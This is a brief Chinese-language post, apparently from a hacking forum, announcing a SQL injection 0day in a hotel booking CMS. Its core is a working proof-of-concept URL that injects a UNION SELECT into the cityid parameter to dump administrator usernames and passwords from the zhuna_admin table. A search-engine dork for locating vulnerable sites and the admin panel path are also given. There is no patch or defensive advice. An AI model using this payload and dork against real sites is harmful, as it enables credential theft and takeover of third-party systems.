国内某酒店CMS的sql inj 0day

作者：hack1990 时间：12-05-30 阅读数：637人阅读

白盒在某种程度上来说也TM是个体力活，MVC的框架让人看到蛋疼

poc:

1. index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin

复制代码

关键词：

1. inurl:index.php?m=hotelinfo

复制代码

后台：

1. index.php?m=admin

相关文章